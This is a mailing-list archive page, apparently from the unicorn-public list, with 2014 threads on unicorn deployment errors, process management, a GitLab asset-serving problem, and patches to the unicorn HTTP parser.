> > /var/www/hailisys/shared/log/unicorn.stderr.log
> > I, [2014-10-24T17:28:53.162084 #15819]  INFO -- : executing
> > ["/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn",
> "-c",
> > "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
> > {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/28)
>
> You're working inside /releases/28 here...
>
> >
> /var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
> > `exec': No such file or directory -
> > /var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn
> > (Errno::ENOENT)
>
> However, it's trying to run out of /releases/6, which I assume is
> old enough to be removed by now.
>
> You should be able to set working_directory in your config/unicorn.rb:
>
>         working_directory "/var/www/hailisys/current"
>
> Then SIGHUP to reload the config before sending SIGUSR2 to it.
>
> Hopefully that works.  Normally you shouldn't need to set
> working_directory if you're working out of "/current";
> but I'm not sure what your deploy environment looks like.
>
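
A minimal config/unicorn.rb along those lines might look roughly like this
(the worker count is arbitrary and the paths simply mirror the deploy_to
above, so treat it as a sketch rather than a known-good config):

  # config/unicorn.rb (sketch)
  working_directory "/var/www/hailisys/current"  # always run from the "current" symlink
  pid "/var/www/hailisys/shared/pids/unicorn.pid"
  worker_processes 2
  preload_app true

After adding working_directory, SIGHUP the running master so it re-reads the
config, then send SIGUSR2 as usual.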


^ permalink raw reply	[relevance 1%]

* Re: Reserved workers not as webservers
  2014-10-09 17:14  0%   ` Devin Ben-Hur
@ 2014-10-09 18:29  0%     ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 18:29 UTC (permalink / raw)
  To: Devin Ben-Hur; +Cc: Michael Fischer, unicorn-public

On Thu, Oct 9, 2014 at 2:14 PM, Devin Ben-Hur <dbenhur@whitepages.com> wrote:
> On 10/9/14, 9:45 AM, Michael Fischer wrote:
>>
>> On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br>
>> wrote:
>>
>>> I'm quite amazed at how preloading and fork can reduce memory usage.
>>> Making it use even less memory and restarting the app faster, the next
>>> step would be to incorporate other daemons (also part of the app, in my
>>> case delayed_job and feed-updater) AS unicorn workers.
>>
>>
>> As your friendly neighborhood service engineer, my experience is that
>> separating the concerns (keeping asynchronous processors separate from
>> your
>> synchronous web services) is worth the additional memory and processor
>> cost.  The two usually don't scale at the same rate, and you want to keep
>> your failure domains separate as well: you don't want a bug in the async
>> processor to cause your web server to crash as well.   And let's not even get
>> into the programming and maintenance challenges.
>
>
> Excellent points Michael.  But to Bráulio's original request, it would be
> lovely to factor out the clean and robust process management parts of
> unicorn (daemonization, pidfile-mgmt, pre-load, fork, reap, signaling)
> separate from the HTTP/Rack server.  This would give us a robust supervisor
> for asynchronous workers that reduces memory footprint with CoW and responds
> to a well understood set of signals for management.

That would be great! If unicorn's server, minus the HTTP-specific code,
could be extracted into a separate gem, it would be fantastic :)

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  2014-10-09 17:59  3%     ` Michael Fischer
@ 2014-10-09 18:01  0%       ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 18:01 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Oh, I see you are talking about the case where you have many machines for a
web app. The ones I admin use one VPS for all services. :)

On Thu, Oct 9, 2014 at 2:59 PM, Michael Fischer <mfischer@zendesk.com> wrote:
> On Thu, Oct 9, 2014 at 10:43 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> As they are forked processes, I never saw a worker problem crash the master
>> or other workers.
>
>
> Process isolation is one thing, but that's not the same thing as system
> isolation.  Imagine your worker process has a memory leak and in response,
> the kernel's OOM killer decides to kill your webserver children.
>
> --Michael



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  2014-10-09 17:43  0%   ` Bráulio Bhavamitra
@ 2014-10-09 17:59  3%     ` Michael Fischer
  2014-10-09 18:01  0%       ` Bráulio Bhavamitra
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2014-10-09 17:59 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: unicorn-public

On Thu, Oct 9, 2014 at 10:43 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

> As they are forked processes, I never saw a worker problem crash the master
> or other workers.


Process isolation is one thing, but that's not the same thing as system
isolation.  Imagine your worker process has a memory leak and in response,
the kernel's OOM killer decides to kill your webserver children.

--Michael


^ permalink raw reply	[relevance 3%]

* Re: Reserved workers not as webservers
  2014-10-09 16:45  3% ` Michael Fischer
  2014-10-09 17:14  0%   ` Devin Ben-Hur
@ 2014-10-09 17:43  0%   ` Bráulio Bhavamitra
  2014-10-09 17:59  3%     ` Michael Fischer
  1 sibling, 1 reply; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 17:43 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Hello Michael,

As they are forked processes, I never saw a worker problem crash the master
or other workers.

Also, unicorn takes care to restart workers if they die, and that is
very useful for daemons too.

I agree with your scaling point, but that could be solved with
different unicorn configurations.

cheers,
bráulio

On Thu, Oct 9, 2014 at 1:45 PM, Michael Fischer <mfischer@zendesk.com> wrote:
> On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> I'm quite amazed at how preloading and fork can reduce memory usage.
>> Making it use even less memory and restarting the app faster, the next
>> step would be to incorporate other daemons (also part of the app, in my
>> case delayed_job and feed-updater) AS unicorn workers.
>
>
> As your friendly neighborhood service engineer, my experience is that
> separating the concerns (keeping asynchronous processors separate from your
> synchronous web services) is worth the additional memory and processor
> cost.  The two usually don't scale at the same rate, and you want to keep
> your failure domains separate as well: you don't want a bug in the async
> processor to cause your web server to crash as well.   And let's not even get
> into the programming and maintenance challenges.
>
> There is such a thing as being too cheap. :)
>
> --Michael
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  2014-10-09 16:45  3% ` Michael Fischer
@ 2014-10-09 17:14  0%   ` Devin Ben-Hur
  2014-10-09 18:29  0%     ` Bráulio Bhavamitra
  2014-10-09 17:43  0%   ` Bráulio Bhavamitra
  1 sibling, 1 reply; 200+ results
From: Devin Ben-Hur @ 2014-10-09 17:14 UTC (permalink / raw)
  To: Michael Fischer, Bráulio Bhavamitra; +Cc: unicorn-public

On 10/9/14, 9:45 AM, Michael Fischer wrote:
> On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>
>> I'm quite amazed at how preloading and fork can reduce memory usage.
>> Making it use even less memory and restarting the app faster, the next
>> step would be to incorporate other daemons (also part of the app, in my
>> case delayed_job and feed-updater) AS unicorn workers.
>
> As your friendly neighborhood service engineer, my experience is that
> separating the concerns (keeping asynchronous processors separate from your
> synchronous web services) is worth the additional memory and processor
> cost.  The two usually don't scale at the same rate, and you want to keep
> your failure domains separate as well: you don't want a bug in the async
> processor to cause your web server to crash as well.   And let's not even get
> into the programming and maintenance challenges.

Excellent points Michael.  But to Bráulio's original request, it would 
be lovely to factor out the clean and robust process management parts of 
unicorn (daemonization, pidfile-mgmt, pre-load, fork, reap, signaling) 
separate from the HTTP/Rack server.  This would give us a robust 
supervisor for asynchronous workers that reduces memory footprint with 
CoW and responds to a well understood set of signals for management.

^ permalink raw reply	[relevance 0%]

* Re: Reserved workers not as webservers
  @ 2014-10-09 16:45  3% ` Michael Fischer
  2014-10-09 17:14  0%   ` Devin Ben-Hur
  2014-10-09 17:43  0%   ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Michael Fischer @ 2014-10-09 16:45 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: unicorn-public

On Thu, Oct 9, 2014 at 5:24 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

> I'm quite amazed at how preloading and fork can reduce memory usage.
> Making it use even less memory and restarting the app faster, the next
> step would be to incorporate other daemons (also part of the app, in my
> case delayed_job and feed-updater) AS unicorn workers.


As your friendly neighborhood service engineer, my experience is that
separating the concerns (keeping asynchronous processors separate from your
synchronous web services) is worth the additional memory and processor
cost.  The two usually don't scale at the same rate, and you want to keep
your failure domains separate as well: you don't want a bug in the async
processor to cause your web server to crash as well.   And let's not even get
into the programming and maintenance challenges.

There is such a thing as being too cheap. :)

--Michael


^ permalink raw reply	[relevance 3%]

* Re: Unicorn not working in GitLab 7.3
  2014-10-06 15:07  3% ` Onno van der Straaten
@ 2014-10-07  5:08  0%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-10-07  5:08 UTC (permalink / raw)
  To: Onno van der Straaten; +Cc: unicorn-public

Onno van der Straaten <onno.van.der.straaten@gmail.com> wrote:
> On Mon, Oct 6, 2014 at 5:04 PM, Onno van der Straaten wrote:

(Top-posting corrected.  Please do not send HTML email as it ends up
 marked as spam.  You would've gotten a response much earlier if you
 sent as plain text)

> > Hi,
> > I am using unicorn in GitLab 7.3. I found that unicorn will not serve
> > javascript files. There is no response. Other files such as css files work
> > fine.
> >
> > I have created an issue at the GitLab site as unicorn is part of their
> > product. For your information
> > https://github.com/gitlabhq/gitlabhq/issues/7973

This doesn't seem to be a configuration error or a bug in GitLab.
unicorn itself does not serve files, but just returns what Rack tells
it to do.

But since you're getting 60s timeouts, something seems seriously wrong
with that config; but at least you're on Linux so maybe strace can
help...

> This is unicorn 4.6.3 btw. On the other machine it is the same
> version 4.6.3. So maybe this issue is related to using unicorn on CentOS.

Can you try:

1) configuring only a single worker process (see the sketch below)
2) strace that worker process (strace -p $PID_OF_WORKER)
3) send only one request for a JS file to see what's happening?
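
A sketch of step 1 in the unicorn config, with the trace commands from steps
2 and 3 as comments (the PID, port and JS path are placeholders):

  # unicorn.rb (sketch): temporarily run a single worker so there is only
  # one process to trace; revert once the hang is understood.
  worker_processes 1

  # then, from a shell:
  #   strace -f -p $PID_OF_WORKER
  #   curl -v http://localhost:8080/assets/application.js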


In any case, if this GitLab instance is meant for any slow/unreliable
client connections outside your LAN, nginx should be serving static
files.  unicorn is grossly inefficient for that (as explained on our
website):

  http://unicorn.bogomips.org/PHILOSOPHY.html

^ permalink raw reply	[relevance 0%]

* Re: Unicorn not working in GitLab 7.3
  @ 2014-10-06 15:07  3% ` Onno van der Straaten
  2014-10-07  5:08  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Onno van der Straaten @ 2014-10-06 15:07 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 582 bytes --]

This is unicorn 4.6.3 btw. On the other machine it is the same
version 4.6.3. So maybe this issue is related to using unicorn on CentOS.

On Mon, Oct 6, 2014 at 5:04 PM, Onno van der Straaten <
onno.van.der.straaten@gmail.com> wrote:

> Hi,
> I am using unicorn in GitLab 7.3. I found that unicorn will not serve
> javascript files. There is no response. Other files such as css files work
> fine.
>
> I have created an issue at the GitLab site as unicorn is part of their
> product. For your information
> https://github.com/gitlabhq/gitlabhq/issues/7973
> Best Regards,
> Onno
>
>

[-- Attachment #2: Type: message/external-body, Size: 84 bytes --]

^ permalink raw reply	[relevance 3%]

* Re: Master hooks needed
  @ 2014-10-03 18:12  3%       ` Valentin Mihov
  0 siblings, 0 replies; 200+ results
From: Valentin Mihov @ 2014-10-03 18:12 UTC (permalink / raw)
  To: Eric Wong; +Cc: Bráulio Bhavamitra, unicorn-public

On Fri, Oct 3, 2014 at 8:50 PM, Eric Wong <e@80x24.org> wrote:
> Valentin Mihov <valentin.mihov@gmail.com> wrote:
>> On Fri, Oct 3, 2014 at 3:22 PM, Eric Wong <e@80x24.org> wrote:
>> > Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>> > > Both operations I currently do (server warm up and old pid kill) need
>> > > to be run only once, and not for every worker as before_fork does,
>> > > that's why I had to put the condition seen above.
>> >
>> > rack.git also has a Rack::Builder#warmup method.  Aman originally
>> > proposed it for unicorn, but it's useful outside of unicorn so
>> > we moved it to Rack.
>>
>> Isn't it much better to do the warmup in an initializer instead of in
>> unicorn? This way you can use preload_app=true and the master will execute
>> the warmup code and fork. Killing the old pid is probably stopping you
>> from doing that, right?
>
> Right, that's exactly what Rack::Builder#warmup does with
> preload_app=true.  If by "initializer" you mean within the application,
> the problem was it lacked the visibility of the entire Rack middleware
> stack which Rack::Builder has.
>
> ref:
> http://bogomips.org/unicorn-public/m/571f2d6c6f4b8df644bd84f069fafa5bde3cde2e
> http://bogomips.org/unicorn-public/m/20130923105807.GA24712%40dcvr.yhbt.net

I was thinking about a Rails initializer, but what you pointed to is a
generalization of that. So, we are talking about the same thing.
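
The Rack::Builder#warmup usage being discussed looks roughly like this in a
config.ru (the request path and app constant here are only placeholders):

  # config.ru (sketch) -- with preload_app true, the block runs once in the
  # master when the app is built, before any worker forks.
  require 'rack/mock'

  warmup do |app|
    Rack::MockRequest.new(app).get('/')  # exercise the full middleware stack
  end

  run MyApp::Application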

^ permalink raw reply	[relevance 3%]

* [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit
    2014-09-22  1:05 10% ` [PATCH 2/4] remove mongrel.rubyforge.org references Eric Wong
  2014-09-22  1:05 10% ` [PATCH 3/4] http: remove the keepalive requests limit Eric Wong
@ 2014-09-22  1:05 12% ` Eric Wong
  2 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-09-22  1:05 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

This allows the parser struct to fit in one cache line on
x86-64 systems where cache lines are 64 bytes.

Using 32-bit integer lengths is safe here because these are only for
tracking offsets within the HTTP header buffer.  We can safely limit
HTTP headers and in-memory buffers to be less than 4GB without
anybody complaining.

HTTP bodies continue to use off_t (usually 64-bit, even on 32-bit
systems) sizes and support as much as the OS/hardware can handle.
---
 ext/unicorn_http/unicorn_http.rl | 18 +++++++++---------
 test/unit/test_http_parser_ng.rb |  6 ++++++
 2 files changed, 15 insertions(+), 9 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 9372d39..3294357 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -29,27 +29,27 @@ void init_unicorn_httpdate(void);
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
 
-static size_t MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
+static unsigned int MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
 
 /* this is only intended for use with Rainbows! */
 static VALUE set_maxhdrlen(VALUE self, VALUE len)
 {
-  return SIZET2NUM(MAX_HEADER_LEN = NUM2SIZET(len));
+  return UINT2NUM(MAX_HEADER_LEN = NUM2UINT(len));
 }
 
 /* keep this small for Rainbows! since every client has one */
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
-  size_t mark;
-  size_t offset;
+  unsigned int mark;
+  unsigned int offset;
   union { /* these 2 fields don't nest */
-    size_t field;
-    size_t query;
+    unsigned int field;
+    unsigned int query;
   } start;
   union {
-    size_t field_len; /* only used during header processing */
-    size_t dest_offset; /* only used during body processing */
+    unsigned int field_len; /* only used during header processing */
+    unsigned int dest_offset; /* only used during body processing */
   } s;
   VALUE buf;
   VALUE env;
@@ -74,7 +74,7 @@ static void parser_raise(VALUE klass, const char *msg)
 }
 
 #define REMAINING (unsigned long)(pe - p)
-#define LEN(AT, FPC) (FPC - buffer - hp->AT)
+#define LEN(AT, FPC) (FPC - buffer - (unsigned long)hp->AT)
 #define MARK(M,FPC) (hp->M = (FPC) - buffer)
 #define PTR_TO(F) (buffer + hp->F)
 #define STR_NEW(M,FPC) rb_str_new(PTR_TO(M), LEN(M, FPC))
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 9167845..d5c8d2e 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -11,6 +11,12 @@ class HttpParserNgTest < Test::Unit::TestCase
     @parser = HttpParser.new
   end
 
+  def test_parser_max_len
+    assert_raises(RangeError) do
+      HttpParser.max_header_len = 0xffffffff + 1
+    end
+  end
+
   def test_next_clear
     r = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
     @parser.buf << r
-- 
EW


^ permalink raw reply related	[relevance 12%]

* [PATCH 3/4] http: remove the keepalive requests limit
    2014-09-22  1:05 10% ` [PATCH 2/4] remove mongrel.rubyforge.org references Eric Wong
@ 2014-09-22  1:05 10% ` Eric Wong
  2014-09-22  1:05 12% ` [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit Eric Wong
  2 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-09-22  1:05 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

This was a hack for some event loops such as those found in nginx
and some Rainbows! concurrency models.  Using epoll/kqueue with
one-shot notification (which yahns does) avoids all fairness
problems.
---
 ext/unicorn_http/unicorn_http.rl | 37 ++------------------
 test/unit/test_http_parser_ng.rb | 74 +---------------------------------------
 2 files changed, 3 insertions(+), 108 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index ecdadb0..9372d39 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -29,29 +29,6 @@ void init_unicorn_httpdate(void);
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
 
-static unsigned long keepalive_requests = 100; /* same as nginx */
-
-/*
- * Returns the maximum number of keepalive requests a client may make
- * before the parser refuses to continue.
- */
-static VALUE ka_req(VALUE self)
-{
-  return ULONG2NUM(keepalive_requests);
-}
-
-/*
- * Sets the maximum number of keepalive requests a client may make.
- * A special value of +nil+ causes this to be the maximum value
- * possible (this is architecture-dependent).
- */
-static VALUE set_ka_req(VALUE self, VALUE val)
-{
-  keepalive_requests = NIL_P(val) ? ULONG_MAX : NUM2ULONG(val);
-
-  return ka_req(self);
-}
-
 static size_t MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
 
 /* this is only intended for use with Rainbows! */
@@ -64,7 +41,6 @@ static VALUE set_maxhdrlen(VALUE self, VALUE len)
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
-  unsigned long nr_requests;
   size_t mark;
   size_t offset;
   union { /* these 2 fields don't nest */
@@ -580,7 +556,6 @@ static VALUE HttpParser_init(VALUE self)
   http_parser_init(hp);
   hp->buf = rb_str_new(NULL, 0);
   hp->env = rb_hash_new();
-  hp->nr_requests = keepalive_requests;
 
   return self;
 }
@@ -814,15 +789,13 @@ static VALUE HttpParser_keepalive(VALUE self)
  *    parser.next? => true or false
  *
  * Exactly like HttpParser#keepalive?, except it will reset the internal
- * parser state on next parse if it returns true.  It will also respect
- * the maximum *keepalive_requests* value and return false if that is
- * reached.
+ * parser state on next parse if it returns true.
  */
 static VALUE HttpParser_next(VALUE self)
 {
   struct http_parser *hp = data_get(self);
 
-  if ((HP_FL_ALL(hp, KEEPALIVE)) && (hp->nr_requests-- != 0)) {
+  if (HP_FL_ALL(hp, KEEPALIVE)) {
     HP_FL_SET(hp, TO_CLEAR);
     return Qtrue;
   }
@@ -984,12 +957,6 @@ void Init_unicorn_http(void)
    */
   rb_define_const(cHttpParser, "LENGTH_MAX", OFFT2NUM(UH_OFF_T_MAX));
 
-  /* default value for keepalive_requests */
-  rb_define_const(cHttpParser, "KEEPALIVE_REQUESTS_DEFAULT",
-                  ULONG2NUM(keepalive_requests));
-
-  rb_define_singleton_method(cHttpParser, "keepalive_requests", ka_req, 0);
-  rb_define_singleton_method(cHttpParser, "keepalive_requests=", set_ka_req, 1);
   rb_define_singleton_method(cHttpParser, "max_header_len=", set_maxhdrlen, 1);
 
   init_common_fields();
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index ab335ac..9167845 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -8,7 +8,6 @@ include Unicorn
 class HttpParserNgTest < Test::Unit::TestCase
 
   def setup
-    HttpParser.keepalive_requests = HttpParser::KEEPALIVE_REQUESTS_DEFAULT
     @parser = HttpParser.new
   end
 
@@ -29,25 +28,6 @@ class HttpParserNgTest < Test::Unit::TestCase
     assert_equal false, @parser.response_start_sent
   end
 
-  def test_keepalive_requests_default_constant
-    assert_kind_of Integer, HttpParser::KEEPALIVE_REQUESTS_DEFAULT
-    assert HttpParser::KEEPALIVE_REQUESTS_DEFAULT >= 0
-  end
-
-  def test_keepalive_requests_setting
-    HttpParser.keepalive_requests = 0
-    assert_equal 0, HttpParser.keepalive_requests
-    HttpParser.keepalive_requests = nil
-    assert HttpParser.keepalive_requests >= 0xffffffff
-    HttpParser.keepalive_requests = 1
-    assert_equal 1, HttpParser.keepalive_requests
-    HttpParser.keepalive_requests = 666
-    assert_equal 666, HttpParser.keepalive_requests
-
-    assert_raises(TypeError) { HttpParser.keepalive_requests = "666" }
-    assert_raises(TypeError) { HttpParser.keepalive_requests = [] }
-  end
-
   def test_connection_TE
     @parser.buf << "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: TE\r\n"
     @parser.buf << "TE: trailers\r\n\r\n"
@@ -71,41 +51,11 @@ class HttpParserNgTest < Test::Unit::TestCase
       "REQUEST_METHOD" => "GET",
       "QUERY_STRING" => ""
     }.freeze
-    HttpParser::KEEPALIVE_REQUESTS_DEFAULT.times do |nr|
-      @parser.buf << req
-      assert_equal expect, @parser.parse
-      assert @parser.next?
-    end
-    @parser.buf << req
-    assert_equal expect, @parser.parse
-    assert ! @parser.next?
-  end
-
-  def test_fewer_keepalive_requests_with_next?
-    HttpParser.keepalive_requests = 5
-    @parser = HttpParser.new
-    req = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n".freeze
-    expect = {
-      "SERVER_NAME" => "example.com",
-      "HTTP_HOST" => "example.com",
-      "rack.url_scheme" => "http",
-      "REQUEST_PATH" => "/",
-      "SERVER_PROTOCOL" => "HTTP/1.1",
-      "PATH_INFO" => "/",
-      "HTTP_VERSION" => "HTTP/1.1",
-      "REQUEST_URI" => "/",
-      "SERVER_PORT" => "80",
-      "REQUEST_METHOD" => "GET",
-      "QUERY_STRING" => ""
-    }.freeze
-    5.times do |nr|
+    100.times do |nr|
       @parser.buf << req
       assert_equal expect, @parser.parse
       assert @parser.next?
     end
-    @parser.buf << req
-    assert_equal expect, @parser.parse
-    assert ! @parser.next?
   end
 
   def test_default_keepalive_is_off
@@ -664,28 +614,6 @@ class HttpParserNgTest < Test::Unit::TestCase
     assert_equal "", @parser.buf
   end
 
-  def test_keepalive_requests_disabled
-    req = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n".freeze
-    expect = {
-      "SERVER_NAME" => "example.com",
-      "HTTP_HOST" => "example.com",
-      "rack.url_scheme" => "http",
-      "REQUEST_PATH" => "/",
-      "SERVER_PROTOCOL" => "HTTP/1.1",
-      "PATH_INFO" => "/",
-      "HTTP_VERSION" => "HTTP/1.1",
-      "REQUEST_URI" => "/",
-      "SERVER_PORT" => "80",
-      "REQUEST_METHOD" => "GET",
-      "QUERY_STRING" => ""
-    }.freeze
-    HttpParser.keepalive_requests = 0
-    @parser = HttpParser.new
-    @parser.buf << req
-    assert_equal expect, @parser.parse
-    assert ! @parser.next?
-  end
-
   def test_chunk_only
     tmp = ""
     assert_equal @parser, @parser.dechunk!
-- 
EW


^ permalink raw reply related	[relevance 10%]

* [PATCH 2/4] remove mongrel.rubyforge.org references
  @ 2014-09-22  1:05 10% ` Eric Wong
  2014-09-22  1:05 10% ` [PATCH 3/4] http: remove the keepalive requests limit Eric Wong
  2014-09-22  1:05 12% ` [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit Eric Wong
  2 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-09-22  1:05 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

mongrel.rubyforge.org has been dead longer than rubyforge.org!
---
 test/test_helper.rb           | 4 ++--
 test/unit/test_http_parser.rb | 4 ++--
 test/unit/test_response.rb    | 4 ++--
 test/unit/test_server.rb      | 4 ++--
 4 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/test/test_helper.rb b/test/test_helper.rb
index c65f2f3..c4fe07a 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
+# Additional work donated by contributors.  See git history
 # for more information.
 
 STDIN.sync = STDOUT.sync = STDERR.sync = true # buffering makes debugging hard
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 8d5b251..2251dcf 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
+# Additional work donated by contributors.  See git history
 # for more information.
 
 require 'test/test_helper'
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index fcddc5e..bdca9f5 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
+# Additional work donated by contributors.  See git history
 # for more information.
 
 require 'test/test_helper'
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index e5b335f..9c92bab 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -1,10 +1,10 @@
 # -*- encoding: binary -*-
 
-# Copyright (c) 2005 Zed A. Shaw 
+# Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
 # the GPLv2+ (GPLv3+ preferred)
 #
-# Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
+# Additional work donated by contributors.  See git history
 # for more information.
 
 require 'test/test_helper'
-- 
EW


^ permalink raw reply related	[relevance 10%]

* Re: Weird Unicorn Timeout Issues (Hibernation problem?)
  @ 2014-08-05 14:46  2%             ` Tony Devlin
  0 siblings, 0 replies; 200+ results
From: Tony Devlin @ 2014-08-05 14:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, Daniel Condomitti

I appreciate all your help Eric and Daniel.  I have not solved this yet,
but I think I have narrowed it down to a Firewall timeout issue.  One app
